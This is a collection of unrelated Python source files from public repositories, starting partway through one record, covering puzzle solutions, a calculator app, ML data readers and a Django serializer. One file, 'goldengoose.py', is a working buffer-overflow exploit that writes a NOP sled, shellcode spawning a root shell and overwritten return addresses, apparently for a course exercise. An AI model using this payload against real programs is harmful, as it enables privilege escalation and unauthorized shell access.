Path(__file__).resolve()\n input_path = script_path.parent / '../inputs' / f'{script_path.stem}.txt'\n\n with input_path.open('r') as f:\n sequence = process_input(f)\n print(\"Part 1:\", part1(sequence))\n print(\"Part 2:\", part2(sequence))\n print(part2([(\"L\", 270)]))\n","repo_name":"FusionX9000/Advent-of-Code-2020","sub_path":"solutions/Day12.py","file_name":"Day12.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"2779599005","text":"import streamlit as st\r\nimport math\r\n\r\n\r\nst.set_page_config(page_title='MathProdigy Calculator', page_icon='calc.png', layout=\"centered\", initial_sidebar_state=\"auto\", menu_items=None)\r\n\r\ndef bmi():\r\n def calculate_bmi(weight, height):\r\n bmi = weight / (height ** 2)\r\n return bmi\r\n\r\n st.markdown(\r\n \"
BMI Calculator
\",\r\n unsafe_allow_html=True)\r\n\r\n weight = st.number_input(\"Enter your weight (in kg)\")\r\n height = st.number_input(\"Enter your height (in meters)\")\r\n\r\n calculate_button = st.button(\"Calculate BMI\")\r\n\r\n if calculate_button:\r\n if weight > 0 and height > 0:\r\n bmi = calculate_bmi(weight, height)\r\n st.success(f\"Your BMI is: **{bmi:.2f}**\")\r\n else:\r\n st.warning(\"Please enter valid weight and height values.\")\r\n\r\n\r\ndef nCal():\r\n st.markdown(\r\n \"Normal Calculator
\",\r\n unsafe_allow_html=True)\r\n\r\n num1 = st.number_input(\"Enter the first number\")\r\n num2 = st.number_input(\"Enter the second number\")\r\n\r\n operation = st.selectbox(\"Select an operation\", [\"+\", \"-\", \"*\", \"/\", \"%\"])\r\n\r\n calculate_button = st.button(\"Calculate\")\r\n\r\n if calculate_button:\r\n if operation == \"+\":\r\n result = num1 + num2\r\n elif operation == \"-\":\r\n result = num1 - num2\r\n elif operation == \"*\":\r\n result = num1 * num2\r\n elif operation == \"/\":\r\n if num2 != 0:\r\n result = num1 / num2\r\n else:\r\n st.warning(\"Cannot divide by zero.\")\r\n result = None\r\n elif operation == \"%\":\r\n result = (num1 * num2) / 100\r\n\r\n if result is not None:\r\n st.success(f\"Result: **{result}**\")\r\n\r\n\r\ndef sCal():\r\n st.markdown(\r\n \"Scientific Calculator
\",\r\n unsafe_allow_html=True)\r\n\r\n num1 = st.number_input(\"Enter the number\")\r\n\r\n operation = st.selectbox(\"Select an operation\", [\"sqrt\", \"sin\", \"cos\", \"tan\"])\r\n\r\n calculate_button = st.button(\"Calculate\")\r\n\r\n if calculate_button:\r\n if operation == \"sqrt\":\r\n result = math.sqrt(num1)\r\n elif operation == \"sin\":\r\n result = math.sin(num1)\r\n elif operation == \"cos\":\r\n result = math.cos(num1)\r\n elif operation == \"tan\":\r\n result = math.tan(num1)\r\n\r\n formatted_result = \"{:.2f}\".format(result)\r\n st.success(f\"Result: **{formatted_result}**\")\r\n\r\n\r\n\r\n\r\n\r\ndef main():\r\n st.sidebar.markdown(\"\"\"\r\n \r\n \r\n \"\"\", unsafe_allow_html=True)\r\n st.sidebar.image(\r\n \"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQXQ6TjjZlNL1X6yug3xJcOzMNx2K2hByEH9g&usqp=CAU\",\r\n use_column_width=True)\r\n st.sidebar.markdown(\"MathProdigy \"\r\n \"Calculator
\", unsafe_allow_html=True)\r\n selected_sidebar = st.sidebar.radio(\"Please Select One\", [\"BMI Calculator\", \"Normal Calculator\",\"Scientific Calculator\"])\r\n\r\n if selected_sidebar == \"BMI Calculator\":\r\n bmi()\r\n elif selected_sidebar == \"Normal Calculator\":\r\n nCal()\r\n elif selected_sidebar == \"Scientific Calculator\":\r\n sCal()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"mlproject5/py10","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"28758707004","text":"\"\"\"\nID: mjmande1\nLANG: PYTHON3\nTASK: subset\n\"\"\"\n\ndef printM(m):\n for s in m:\n print(s)\n print(\"====\")\n\ndef solve( n, k):\n n = int(n) \n k = int(k) \n if (n < 0 or k < 0): return 0\n elif (matrix[n][k] != -1): return matrix[n][k]\n elif (n == 0 and k == 0): return 1\n else:\n matrix[n][k]=solve(n, k-1) + solve(n - k, k - 1)\n return matrix[n][k]\n\nfin = open('subset.in', 'r')\nfout = open('subset.out', 'w')\n\nN = int(fin.readline())\n\nif (N % 4 == 1 or N % 4 == 2):\n fout.write('0\\n')\n quit()\n\ny = N*2\nx = N\ntarget = N * (N + 1) / 2\n\nmatrix = [[-1 for i in range(N + 1)] for i in range(int(target / 2 + 1))]\n\nanser = solve(N * (N + 1) / 4, N) / 2\nfout.write(str(int(anser)) + '\\n')\nfout.close()\nfin.close() ","repo_name":"Boomer-Sooner-PC/Competitive-Programming","sub_path":"USACO/Subset Sums/subset.py","file_name":"subset.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"41401572418","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# This software and supporting documentation are distributed by\n# Institut Federatif de Recherche 49\n# CEA/NeuroSpin, Batiment 145,\n# 91191 Gif-sur-Yvette cedex\n# France\n#\n# This software is governed by the CeCILL license version 2 under\n# French law and abiding by the rules of distribution of free software.\n# You can use, modify and/or redistribute the software under the\n# terms of the CeCILL license version 2 as circulated by CEA, CNRS\n# and INRIA at the following URL \"http://www.cecill.info\".\n#\n# As a counterpart to the access to the source code and rights to copy,\n# modify and redistribute granted by the license, users are provided only\n# with a limited warranty and the software's author, the holder of the\n# economic rights, and the successive licensors have only limited\n# liability.\n#\n# In this respect, the user's attention is drawn to the risks associated\n# with loading, using, modifying and/or developing or reproducing the\n# software by the user in light of its specific status of free software,\n# that may mean that it is complicated to manipulate, and that also\n# requirements in conditions enabling the security of their systems and/or\n# data to be ensured and, more generally, to use and operate it in the\n\n\"\"\"\nThis program converts volumes contained in a folder into buckets.\nIt writes bucket files in the output folder\n\"\"\"\nimport argparse\nimport sys\nimport os\nimport csv\nimport six\n\n\ndef parse_args(argv):\n \"\"\"Parses command-line arguments\n\n Args:\n argv: a list containing command line arguments\n\n Returns:\n args\n \"\"\"\n\n # Parse command line arguments\n parser = argparse.ArgumentParser(\n prog='suppress_files_from_csv.py',\n description='Suppress files listed in csv')\n parser.add_argument(\n \"-c\", \"--csv_file\", type=str, required=True,\n help='csv file containing file names to suppress.')\n\n args = parser.parse_args(argv)\n\n return args\n\n\ndef suppress(csv_file_name):\n \"\"\"Suppress files listed in csv\n \"\"\"\n print(csv_file_name)\n print(f\"Suppressing filenames contained in {csv_file_name}...\", end='')\n removed = 0\n with open(csv_file_name, 'r') as f:\n reader = csv.reader(f)\n for idx, row in enumerate(reader):\n filename = row[0]\n print(\".\", end='')\n if os.path.isfile(filename):\n removed += 1\n print(filename)\n os.remove(filename)\n os.remove(f\"{row[0]}.minf\")\n print(\"DONE\")\n print(f\"Number of removed files = {removed}\")\n print(f\"Number of files in csv = {idx+1}\")\n\n\ndef main(argv):\n \"\"\"Reads argument line and creates cropped files and pickle file\n\n Args:\n argv: a list containing command line arguments\n \"\"\"\n\n # This code permits to catch SystemExit with exit code 0\n # such as the one raised when \"--help\" is given as argument\n try:\n # Parsing arguments\n args = parse_args(argv)\n suppress(args.csv_file)\n except SystemExit as exc:\n if exc.code != 0:\n six.reraise(*sys.exc_info())\n\n\nif __name__ == '__main__':\n # This permits to call main also from another python program\n # without having to make system calls\n main(argv=sys.argv[1:])\n","repo_name":"neurospin/deep_folding","sub_path":"deep_folding/brainvisa/utils/suppress_files_from_csv.py","file_name":"suppress_files_from_csv.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"}
+{"seq_id":"36047374897","text":"import sys\nimport os\n\noffset = int(sys.argv[1])\n\nNOPSLED = bytes.fromhex('90')\nNOPSLED = NOPSLED * 0x40\n\nSHELLCODE = b\"\\x48\\x31\\xff\\xb0\\x69\\x0f\\x05\\x48\\x31\\xd2\\x48\\xbb\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\\xc1\\xeb\\x08\\x53\\x48\\x89\\xe7\\x48\\x31\\xc0\\x50\\x57\\x48\\x89\\xe6\\xb0\\x3b\\x0f\\x05\\x6a\\x01\\x5f\\x6a\\x3c\\x58\\x0f\\x05\"\n\n\nRETURNADDRESS = b\"00007fff\"\nRETURNADDRESS2 = b\"fffde000\"\nRETURNADDRESS = int(RETURNADDRESS, 16)\nRETURNADDRESS2 = int(RETURNADDRESS2, 16) + 0x20 * offset\nRETURNADDRESS = RETURNADDRESS.to_bytes(4, 'little')\nRETURNADDRESS2 = RETURNADDRESS2.to_bytes(4, 'little')\nRETURNADDRESSBLOCK = (RETURNADDRESS2 + RETURNADDRESS) * 0x100\n\nwith os.fdopen(sys.stdout.fileno(), \"wb\", closefd=False) as stdout:\n stdout.write(NOPSLED + SHELLCODE + RETURNADDRESSBLOCK + B'\\n')\n\nwith os.fdopen(sys.stderr.fileno(), \"w\", closefd=False) as stderr:\n stderr.write(RETURNADDRESS2.hex() + RETURNADDRESS.hex() + \"\\n\")","repo_name":"MostlyMaple/GoldenGoose","sub_path":"victim27/goldengoose.py","file_name":"goldengoose.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"11332488797","text":"\"\"\"\nauthor: Arif Bashar\n\nCreate an ID3 decision tree to classify some datasets\n\"\"\"\n\nimport sys\nimport numpy as np\n\ndef sortColumn(data, column):\n return data[data[:,column].argsort()]\n\n# Return a list of probabilities for each class in the last column\ndef getClassProb(data):\n classes = np.unique(data[:, -1])\n probabilities = []\n for index in range(len(classes)):\n count = np.count_nonzero(data[:,-1] == classes[index])\n probabilities.append(count/len(data))\n return probabilities\n\n# Get information of our class labels\ndef getInfo(data):\n probabilities = getClassProb(data)\n\n info = sum(probabilities * -np.log2(probabilities))\n return info\n\n# Determining potential binary split points based on attribute value changes\n# Return dictionary containing potential split points\ndef getPotSplits(data):\n\n \"\"\"\n Using a dictionary to store the potential splits for each column\n key: column -- value: split point\n \n \"\"\"\n\n splits = {}\n _ , colSize = data.shape\n colSize -= 1\n\n for colIndex in range(colSize):\n data = sortColumn(data, colIndex)\n splits[colIndex] = [] # Use a list to store all potential splits \n values = data[:, colIndex] # Grab all values for the column\n uniqueValues = np.unique(values) # Get rid of duplicates (we only want value changes)\n\n # Enter this loop to calculate actual split points\n for index in range(len(uniqueValues)):\n if index > 0: # Skip index 0 because we can't get its previous \n current = uniqueValues[index] \n previous = uniqueValues[index-1]\n split = (current + previous) / 2\n splits[colIndex].append(split)\n\n return splits\n\n# Average the two values to make the split: those examples less than the split \n# value and those examples greater than or equal to the split value\n# Return two lists: all values above split and all values below specified split\ndef splitData(data, column, splitValue):\n values = data[:, column]\n greaterValues = data[values >= splitValue] \n lesserValues = data[values < splitValue]\n\n return greaterValues, lesserValues\n\n# Calculate the entropy so we can determine the best split\ndef getEntropy(greaterData, lesserData):\n dataCount = len(greaterData) + len(lesserData)\n greaterProb = len(greaterData) / dataCount\n lesserProb = len(lesserData) / dataCount\n entropy = (lesserProb * getInfo(lesserData) + greaterProb * getInfo(greaterData))\n\n return entropy\n\n# Determine the best split where \ndef getBestSplit(data, potentialSplits):\n # We will decide the best split based on max information gain\n maxGain = 0\n\n for column in potentialSplits:\n data = sortColumn(data, column)\n for split in potentialSplits[column]:\n greaterValues, lesserValues = splitData(data, column, split)\n entropy = getEntropy(greaterValues, lesserValues)\n gain = getInfo(data) - entropy\n\n if (maxGain < gain):\n maxGain = gain\n bestSplit = split\n bestColumn = column\n\n return bestColumn, bestSplit, maxGain\n\n# Check terminal cases\ndef isTerminal(data):\n labelColumn = data[:, -1]\n classes = np.unique(labelColumn)\n\n if len(classes) == 1:\n return True\n else:\n return False\n\n# Classify the data given what is in the last column\ndef classify(data):\n classes = np.unique(data[:, -1])\n uniqueClasses, uniqueCount = np.unique(classes, return_counts=True)\n \n index = uniqueCount.argmax()\n classification = uniqueClasses[index]\n\n return classification\n\n# Main recursive algorithm to build our decision tree\ndef buildTree(data):\n if isTerminal(data):\n return 
classify(data)\n \n else:\n potentialSplits = getPotSplits(data)\n bestColumn, bestSplit, _ = getBestSplit(data, potentialSplits)\n greaterValues, lesserValues = splitData(data, bestColumn, bestSplit)\n\n question = \"{} <= {}\".format(bestColumn, bestSplit)\n tree = {question: []}\n leftNode = buildTree(lesserValues)\n rightNode = buildTree(greaterValues)\n\n if rightNode == leftNode:\n tree = rightNode\n else:\n tree[question].append(leftNode)\n tree[question].append(rightNode)\n\n return tree\n\n# Use testing data and try to predict its classification one row at a time\ndef predict(testData, tree):\n question = list(tree.keys())[0]\n col, comparison, value = question.split(\" \")\n\n # Ask the question\n if comparison == \"<=\":\n if testData[int(col)] <= float(value):\n prediction = tree[question][0]\n else:\n prediction = tree[question][1]\n\n # Base case for recursion\n if not isinstance(prediction, dict):\n return prediction\n \n # Recurse through\n else:\n remainingTree = prediction\n return predict(testData, remainingTree)\n\n# Returns number of correct predictions\ndef getAccuracy(data, tree):\n accuracy = 0\n for row in range(len(data)):\n prediction = predict(data[row], tree)\n if prediction == data[row][-1]:\n accuracy += 1\n return accuracy\n \ndef main():\n trainDataName = (sys.argv[1])\n testDataName = (sys.argv[2])\n\n train = np.loadtxt(trainDataName)\n test = np.loadtxt(testDataName)\n\n if len(train.shape) < 2:\n train = np.array([train])\n if len(test.shape) < 2:\n test = np.array([test])\n\n tree = buildTree(train)\n print(tree)\n # print(getAccuracy(test, tree))\n\n \n\nmain()","repo_name":"arif-bashar/id3-decision","sub_path":"id3.py","file_name":"id3.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"15176706014","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\"\nCan you modify your previous Insertion Sort implementation to keep track of the number of \nshifts it makes while sorting? The only thing you should print is the number of shifts made \nby the algorithm to completely sort the array. A shift occurs when an element's position \nchanges in the array. Do not shift an element if it is not necessary.\n\nFunction Description:\nComplete the runningTime function below.\nrunningTime has the following parameter:\nINPUT:\n int arr[n]: an array of integers\nOUTPUT:\n int: the number of shifts it will take to sort the array\n \nLink to problem statement:\nhttps://www.hackerrank.com/challenges/runningtime/problem\n\"\"\"\n\n#!/bin/python3\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\"\"\"\nComplete the 'runningTime' function below.\nThe function is expected to return an INTEGER.\nThe function accepts INTEGER_ARRAY arr as parameter.\n\nLink to problem statement:\nhttps://www.hackerrank.com/challenges/runningtime/problem\n\"\"\"\n\ndef runningTime(arr):\n total_shifts = 0\n for i in range(1, len(arr)):\n shifts = 0\n target_num = arr[i]\n j = i -1\n while j>=0 and (arr[j] > target_num):\n arr[j+1] = arr[j]\n j -= 1\n shifts += 1\n arr[j+1] = target_num\n #print(shifts, arr)\n total_shifts += shifts\n return total_shifts\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n n = int(input().strip())\n arr = list(map(int, input().rstrip().split()))\n result = runningTime(arr)\n fptr.write(str(result) + '\\n')\n fptr.close()\n","repo_name":"akerimov/HACKER_RANK","sub_path":"RunningTime.py","file_name":"RunningTime.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"42460805732","text":"import json\nimport logging\nfrom collections import Counter\nfrom itertools import combinations\nfrom typing import Dict, List, Tuple\n\nfrom allennlp.data.dataset_readers.dataset_reader import DatasetReader\nfrom allennlp.data.fields import Field, LabelField, MetadataField, TextField\nfrom allennlp.data.instance import Instance\nfrom allennlp.data.token_indexers import SingleIdTokenIndexer, TokenIndexer\nfrom allennlp.data.tokenizers import Token, Tokenizer\nfrom overrides import overrides\n\nlogger = logging.getLogger(__name__) # pylint: disable=invalid-name\n\n\n@DatasetReader.register(\"scirex_coreference_train_reader\")\nclass ScirexCoreferenceTrainReader(DatasetReader):\n def __init__(\n self,\n sample_train: bool = False,\n tokenizer: Tokenizer = None,\n token_indexers: Dict[str, TokenIndexer] = None,\n lazy: bool = False,\n ) -> None:\n super().__init__(lazy)\n self._sample_train = sample_train\n self._tokenizer = tokenizer\n self._token_indexers = token_indexers or {\"tokens\": SingleIdTokenIndexer()}\n\n @overrides\n def _read(self, file_path: str):\n pairs = self.generate_pairs(file_path)\n\n logger.info(\"NUMBER OF PAIRS - %d\", len(pairs))\n\n c = Counter([x[2] for x in pairs])\n min_count = min(c.values())\n prob = {k: min(1, min_count / v) for k, v in c.items()}\n\n logger.info(\"Loaded all pairs from %s\", file_path)\n for w1, w2, gold_label in pairs:\n yield self.text_to_instance(\n w1, w2, gold_label, prob[gold_label] if \"train.jsonl\" in file_path else 1.0\n )\n\n @staticmethod\n def generate_pairs(file_path):\n pairs = []\n with open(file_path, \"r\") as data_file:\n for _, line in enumerate(data_file):\n ins = json.loads(line)\n entities: List[Tuple[int, int, str]] = [tuple(x) for x in ins[\"ner\"]]\n\n clusters = {}\n for k, vlist in ins[\"coref\"].items():\n for v in vlist:\n if tuple(v) not in clusters:\n clusters[tuple(v)] = []\n clusters[tuple(v)].append(k)\n\n clusters = {k: set(v) for k, v in clusters.items()}\n\n for mention_1, mention_2 in combinations(entities, 2):\n type_1, type_2 = mention_1[2], mention_2[2]\n if type_1 != type_2:\n continue\n\n cluster_labels_1, cluster_labels_2 = (\n clusters.get((mention_1[0], mention_1[1]), set()),\n clusters.get((mention_2[0], mention_2[1]), set()),\n )\n w1, w2 = (\n \" \".join(ins[\"words\"][mention_1[0] : mention_1[1]]),\n \" \".join(ins[\"words\"][mention_2[0] : mention_2[1]]),\n )\n\n if w1.lower() == w2.lower() or len(cluster_labels_1 & cluster_labels_2) > 0:\n gold_label = 1\n elif len(cluster_labels_1) == 0 and len(cluster_labels_2) == 0:\n continue\n elif len(cluster_labels_1 & cluster_labels_2) == 0:\n gold_label = 0\n\n pairs.append((type_1 + \" \" + w1, type_2 + \" \" + w2, gold_label))\n return pairs\n\n @overrides\n def text_to_instance(\n self, # type: ignore\n premise: str,\n hypothesis: str,\n label: int,\n prob: float = None,\n ) -> Instance:\n fields: Dict[str, Field] = {}\n premise_tokens = self._tokenizer.tokenize(premise)\n hypothesis_tokens = self._tokenizer.tokenize(hypothesis)\n\n fields[\"tokens\"] = TextField(\n [Token(\"[CLS]\")] + premise_tokens + [Token(\"[SEP]\")] + hypothesis_tokens, self._token_indexers\n )\n \n fields[\"label\"] = LabelField(label, skip_indexing=True)\n\n metadata = {\n \"premise_tokens\": [x.text for x in premise_tokens],\n \"hypothesis_tokens\": [x.text for x in hypothesis_tokens],\n \"keep_prob\": prob,\n }\n fields[\"metadata\"] = MetadataField(metadata)\n\n return 
Instance(fields)\n","repo_name":"bernaljg/N-aryRels","sub_path":"SciREX/scirex/data/dataset_readers/coreference_train_reader.py","file_name":"coreference_train_reader.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"43039093957","text":"S=map(int,input())\ninput()\nmask=sum(2**i for i in map(int,input().split()))\nMOD=998244353\n\ndigits=0 # set(S[:i]) をbitで表したもの\nSpre=0 # int(S[:i])%MOD\ndps=[0]*1024 # 総和\ndpc=[0]*1024 # 個数\nfor i,c in enumerate(S):\n\tnew_dpc=[0]*1024\n\tnew_dps=[0]*1024\n\tfor m in range(1,1024):\n\t\tfor d in range(10):\n\t\t\tnew_dpc[m|1<\")[1:]\n seq_lst=[i.split(\"\\n\")[1] for i in fa_lst]\n val_pam(seq_lst)\n for index,ele in enumerate(fa_lst): \n num=index+1\n seq=ele.split(\"\\n\")[1]\n seq30.append(seq)\n new_ele=\">\"+ele\n new_str+=new_ele\n if num%9==0:##because the quikfold can just run the pipline maximum 9 jobs!!!\n \n input_matrix=featurization.get_input(new_str)\n output=predict(this_input=input_matrix,typ=typ_,full_length=full_length,site=site)\n all_list+=list(output)\n new_str=\"\"\n elif num==len(fa_lst) or (len(fa_lst)-num)==(len(fa_lst)%9-1):\n new_str=\"\"\n for k,i in enumerate(fa_lst[index:]): \n seq=i.split(\"\\n\")[1]\n if num!=len(fa_lst)-len(fa_lst)%9+1:#the first item of interaction\n seq30.append(seq)\n ele=\">\"+i\n num+=1\n new_str+=ele\n input_matrix=featurization.get_input(new_str)\n output=predict(input_matrix,typ=typ_,full_length=full_length,site=site)\n all_list+=list(output)\n break\n rsl=pd.DataFrame({\"30mer\":seq30,\"GNL-Scorer\":all_list})\n rsl.to_csv(\"%s_GNL_result.csv\" % typ_,sep=\",\")\n \n","repo_name":"TerminatorJ/CRISPR-TRAP-seq","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"40640800247","text":"from django.contrib.auth.models import User\nfrom django.db import transaction\nfrom api.serializers.NonSensitiveUserProfileSerializer import NonSensitiveUserProfileSerializer\nfrom ..validators.FirstAndLastNameValidator import validate_first_name, validate_last_name\nfrom utils.EmailSendingFailedError import EmailSendingFailedError\nfrom api.helper_functions import send_email_helper\nfrom rest_framework import serializers\nfrom api.helper_functions import delete_file_from_media\nimport logging\n\nlogger = logging.getLogger('django')\n\n\nclass CompleteUserProfileSerializer(NonSensitiveUserProfileSerializer):\n\n USER_FIELDS = ['first_name', 'last_name']\n USERPROFILE_FIELDS = ['city', 'state', 'country', 'timezone', 'bio', 'photo', 'slack_handle', 'linkedin', 'instagram', 'facebook', 'twitter', 'medium']\n\n first_name = serializers.CharField(validators=[validate_first_name])\n last_name = serializers.CharField(validators=[validate_last_name])\n\n class Meta:\n model = User\n fields = ['id', 'first_name', 'last_name', 'email', 'status', 'highest_role', 'date_joined', 'role_teams', 'city', 'state', 'country', 'timezone', 'bio', 'photo', 'slack_handle', 'linkedin', 'instagram', 'facebook', 'twitter', 'medium']\n\n extra_kwargs = {\n 'email': {'read_only': True},\n 'date_joined': {'read_only': True},\n }\n\n def update(self, instance, validated_data):\n user = instance\n profile = instance.userprofile\n userprofile_data = validated_data.pop('userprofile')\n email = user.email\n photo_before_update = profile.photo\n\n # set user data\n user.first_name = validated_data.get('first_name', instance.first_name)\n user.last_name = validated_data.get('last_name', instance.last_name)\n\n # set profile data\n for k, v in userprofile_data.items():\n setattr(profile, k, v)\n with transaction.atomic():\n user.save()\n profile.save()\n email_sent = send_email_helper(email, 'User Profile updated at WWCode-Silicon Valley', 'userprofile_update_email.html', {})\n if not email_sent:\n raise EmailSendingFailedError()\n photo_after_update = profile.photo\n if photo_before_update != photo_after_update and photo_before_update:\n try:\n delete_file_from_media(photo_before_update.name)\n except Exception as e:\n logger.error(f'CompleteUserProfileSerializer Update: error deleting previous image: {e}')\n return user\n","repo_name":"blulady/WWCode-SV","sub_path":"api/wwcodesvtools/api/serializers/CompleteUserProfileSerializer.py","file_name":"CompleteUserProfileSerializer.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"18966738567","text":"import tensorflow as tf\nimport numpy as np\nimport glob\nimport struct\nimport data\n\n\n\n\ndef get_mask(actual_len, target_len):\n if actual_len>=target_len:\n return tf.ones([target_len],tf.float32)\n else:\n ones=tf.ones([actual_len],tf.float32)\n zeros=tf.zeros([target_len-actual_len],tf.float32)\n return tf.concat([ones,zeros],axis=0)\n\n\n\ndef raw_record_generator(data_path, img_feature_path, logger, sim_img_feature_path = None, dissim_img_feature_path = None, max_img_num=10):\n \"\"\"Generates tf.Examples from data files.\n\n Binary data format: . represents the byte size\n of . is serialized tf.Example proto. The tf.Example contains\n the tokenized article text and summary.\n\n Args:\n data_path:\n Path to tf.Example data files. Can include wildcards, e.g. if you have several training data chunk files train_001.bin, train_002.bin, etc, then pass data_path=train_* to access them all.\n single_pass:\n Boolean. If True, go through the dataset exactly once, generating examples in the order they appear, then return. Otherwise, generate random examples indefinitely.\n\n Yields:\n Deserialized tf.Example.\n \"\"\"\n\n filelist = glob.glob(data_path) # get the list of datafiles\n feature_list = glob.glob(img_feature_path)\n assert filelist, ('Error: Empty filelist at %s' % data_path) # check filelist isn't empty\n assert feature_list, ('Error: Empty feature_list at %s' % img_feature_path)\n\n filelist = sorted(filelist)\n feature_list = sorted(feature_list)\n\n sim_feature_list = glob.glob(sim_img_feature_path)\n dissim_feature_list = glob.glob(dissim_img_feature_path)\n assert sim_feature_list, ('Error: Empty feature_list at %s' % sim_img_feature_path)\n assert dissim_feature_list, ('Error: Empty feature_list at %s' % dissim_img_feature_path)\n sim_feature_list = sorted(sim_feature_list)\n dissim_feature_list = sorted(dissim_feature_list)\n # text_img_pairs = list(zip(filelist, feature_list, sim_feature_list, dissim_feature_list))\n\n \n\n for c_idx in range(len(filelist)):\n text_f = filelist[c_idx]\n img_f = feature_list[c_idx]\n reader = open(text_f, 'rb')\n chunk_img_arr = np.load(img_f)\n sim_img_f = sim_feature_list[c_idx]\n dissim_img_f = dissim_feature_list[c_idx]\n chunk_sim_img_arr = np.load(sim_img_f)\n chunk_dissim_img_arr = np.load(dissim_img_f)\n img_idx = 0\n img_num = len(list(chunk_img_arr))\n while True:\n len_bytes = reader.read(8)\n if not len_bytes: break # finished reading this file\n if img_idx == img_num: break\n img_feature = chunk_img_arr['arr_{}'.format(img_idx)]\n img_feature = img_feature[:, :max_img_num, :]\n #For similar images\n #Dataset has max 10 similar and 10 dissimilar images per article\n sim_img_feature = chunk_sim_img_arr['arr_{}'.format(img_idx)]\n sim_img_feature = sim_img_feature[:, :max_img_num, :]\n #For dissimilar images\n dissim_img_feature = chunk_dissim_img_arr['arr_{}'.format(img_idx)]\n dissim_img_feature = dissim_img_feature[:, :max_img_num, :]\n img_idx += 1\n str_len = struct.unpack('q', len_bytes)[0]\n example_str = struct.unpack('%ds' % str_len, reader.read(str_len))[0]\n e=tf.train.Example.FromString(example_str)\n try:\n article_text = e.features.feature['article'].bytes_list.value[0] # the article text was saved under the key 'article' in the data files\n abstract_text = e.features.feature['abstract'].bytes_list.value[0] # the abstract text was saved under the key 'abstract' in the data files\n url_hash = e.features.feature['url_hash'].bytes_list.value[0]\n except ValueError:\n 
logger.error('Failed to get article or abstract or url_hash from example')\n continue\n if len(article_text)==0: \n logger.warning('Found an example with empty article text. Skipping it.')\n elif len(abstract_text)==0:\n logger.warning('Found an example with empty abstract text. Skipping it.')\n else:\n yield (url_hash, article_text , abstract_text , img_feature, sim_img_feature, dissim_img_feature)\n\n\n\ndef example_generator(raw_dataset,params,vocab,batch_size):\n #Example generator\n for raw_record in raw_dataset:\n url_hash = raw_record[0].numpy().decode(\"utf-8\") \n article=raw_record[1].numpy().decode(\"utf-8\")\n abstract=raw_record[2].numpy().decode(\"utf-8\")\n img_feature=raw_record[3]\n if params.mode == \"train\":\n sim_img_feature = tf.squeeze(raw_record[4],axis=0) #shape (10, img_embed_dim)\n dissim_img_feature=tf.squeeze(raw_record[5], axis=0)\n img_feature = tf.squeeze(img_feature, axis=0) # shape == (img_num, img_embed_dim)\n img_num = img_feature.shape[0]\n abstract_sentences = [sent.strip() for sent in data.abstract2sents(abstract)]\n start_decoding = vocab.word2id(data.START_DECODING)\n stop_decoding = vocab.word2id(data.STOP_DECODING)\n # Process the article\n article_words = article.split()\n if len(article_words) > params.max_enc_steps:\n article_words = article_words[:params.max_enc_steps]\n enc_len = len(article_words) # store the length after truncation but before padding\n enc_input = [vocab.word2id(w) for w in article_words] # list of word ids; OOVs are represented by the id for UNK token\n # Process the abstract\n abstract = ' '.join(abstract_sentences) # string\n abstract_words = abstract.split() # list of strings\n abs_ids = [vocab.word2id(w) for w in abstract_words] # list of word ids; OOVs are represented by the id for UNK token\n\n # Get the decoder input sequence and target sequence\n dec_input, target = data.get_dec_inp_targ_seqs(abs_ids, params.max_dec_steps, start_decoding, stop_decoding)\n dec_len = len(dec_input)\n\n #Testing if any of the lengths is zero or not\n if img_num==0 or enc_len==0 or dec_len==0:\n continue\n\n if params.pointer_gen:\n # Store a version of the enc_input where in-article OOVs are represented by their temporary OOV id; also store the in-article OOVs words themselves\n enc_input_extend_vocab, article_oovs = data.article2ids(article_words, vocab)\n\n # Get a verison of the reference summary where in-article OOVs are represented by their temporary article OOV id\n abs_ids_extend_vocab = data.abstract2ids(abstract_words, vocab, article_oovs)\n\n # Overwrite decoder target sequence so it uses the temp article OOV ids\n _, target = data.get_dec_inp_targ_seqs(abs_ids_extend_vocab, params.max_dec_steps, start_decoding, stop_decoding)\n \n\n enc_mask=get_mask(enc_len,enc_len)\n dec_mask=get_mask(dec_len,params.max_dec_steps)\n if params.mode == \"train\" and \"SIMPAD\" in params.experiment:\n img_mask=get_mask(img_num,params.max_img_num)\n else:\n img_mask=get_mask(img_num,img_num)\n \n \n \n output = {\n \"enc_len\": enc_len,\n \"enc_input\": enc_input,\n \"enc_input_extend_vocab\": enc_input_extend_vocab,\n \"enc_mask\": enc_mask,\n \"article_oovs\": article_oovs,\n \"dec_input\": dec_input,\n \"target\": target,\n \"dec_len\": dec_len,\n \"dec_mask\":dec_mask,\n \"article\": article,\n \"abstract\": abstract,\n \"abstract_sents\": abstract_sentences,\n \"img_feature\": img_feature,\n \"img_num\":img_num,\n 